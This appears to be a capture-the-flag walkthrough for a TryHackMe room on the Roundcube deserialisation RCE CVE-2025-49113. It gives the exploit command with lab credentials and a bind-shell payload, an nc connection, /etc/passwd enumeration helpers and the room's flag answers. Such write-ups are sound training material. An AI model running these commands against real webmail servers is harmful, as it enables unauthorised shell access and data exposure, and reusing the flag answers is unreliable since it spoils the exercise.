Friendly Access here!

Room: https://tryhackme.com/room/roundcubecve202549113

This time, we're diving into a post-auth Remote Code Execution vulnerability in Roundcube, CVE-2025-49113 (a PHP object deserialisation bug). This one's clean and simple: with a valid webmail login, a few moves get you a shell on the box as the web-server user.

Step 1: Clone the Exploit

First things first: grab the PoC from GitHub.

git clone https://github.com/fearsoff-org/CVE-2025-49113
cd CVE-2025-49113/

Step 2: Identify Valid Credentials

This is a post-auth bug, so the exploit needs a valid Roundcube login before it can do anything. Browse to the Roundcube login page on the target to confirm it is up; the room gave us:

Username: ellieptic  
Password: ChangeMe123

Step 3: Fire the Exploit

Launch the RCE using the exploit:

php CVE-2025-49113.php http://10.10.82.9/roundcube ellieptic ChangeMe123 "ncat -lvnp 4444 -e /bin/bash"

Note what the payload does: ncat -lvnp 4444 -e /bin/bash starts a bind shell on the target, listening on port 4444 and handing /bin/bash to whoever connects. Nothing calls back to you, so there is no listener to set up on your side. The HTTP request that triggers the command may not return until that shell exits, so don't wait for the PoC to finish; just connect to the port:

nc 10.10.82.9 4444

Done. Bind shell in. You're now sitting inside:

/var/www/html/roundcube

Step 4: Enumerate the System

Do the usual. Check users, check permissions, and see what's what:

cat /etc/passwd

Found multiple users. The shell runs as www-data (confirm with id), which is enough here: /etc/passwd is world-readable, and its fifth field (GECOS) carries each human user's full name, which is where the "Maggie" question below gets answered.

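Rather than reading all of /etc/passwd, the enumeration in Step 4 goes quicker with a couple of awk helpers that pull out the accounts that can actually log in and look users up by first name. This is an added example, not the room's or the PoC's code; it runs against a file path, so it works on the real /etc/passwd on the target or on the constructed sample embedded below (the username mbyte and the UIDs are invented for the sample).

```bash
#!/usr/bin/env bash
# Added example for Step 4: filter /etc/passwd instead of eyeballing it.
# Every function takes the passwd file as its first argument.
set -u

# list_login_users FILE
# Accounts with UID 0 or UID >= 1000 whose shell is not nologin/false.
list_login_users() {
    awk -F: '($3 == 0 || $3 >= 1000) && $7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# full_name FILE USERNAME
# The "full name" part of the GECOS field (everything before the first comma).
full_name() {
    awk -F: -v u="$2" '$1 == u { split($5, g, ","); print g[1] }' "$1"
}

# find_by_first_name FILE FIRSTNAME
# Prints "username<TAB>full name" for each user whose GECOS first word matches.
# Accounts with an empty GECOS field are skipped rather than matched.
find_by_first_name() {
    awk -F: -v first="$2" '{
        split($5, g, ",");
        n = split(g[1], w, " ");
        if (n > 0 && w[1] == first) printf "%s\t%s\n", $1, g[1]
    }' "$1"
}

# Constructed sample passwd file (not the room's real /etc/passwd): a few
# system accounts plus two human users; "mbyte" is a hypothetical username.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:110:115:MySQL Server,,,:/nonexistent:/bin/false
ellieptic:x:1000:1000:,,,:/home/ellieptic:/bin/bash
mbyte:x:1001:1001:Maggie Byte,,,:/home/mbyte:/bin/bash
EOF

echo "== accounts that can log in =="
list_login_users "$SAMPLE"
echo "== who is Maggie? =="
find_by_first_name "$SAMPLE" Maggie
```

On the target, drop the sample and call the functions with /etc/passwd; the www-data account we are running as shows up with a nologin shell, which is why the web server's shell is the only way in for that user.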

Step 5: Find the Flag

Navigate to /etc/ and there it is:

cat /etc/flag.txt

Output:

THM{ICE_CUBE_DESERIALISATION}
"After three rounds of coffee, I deserialised the object."

Flags

One of the users has the first name of Maggie; what is her last name?

Byte

What is the value of the flag saved in /etc?

THM{ICE_CUBE_DESERIALISATION}
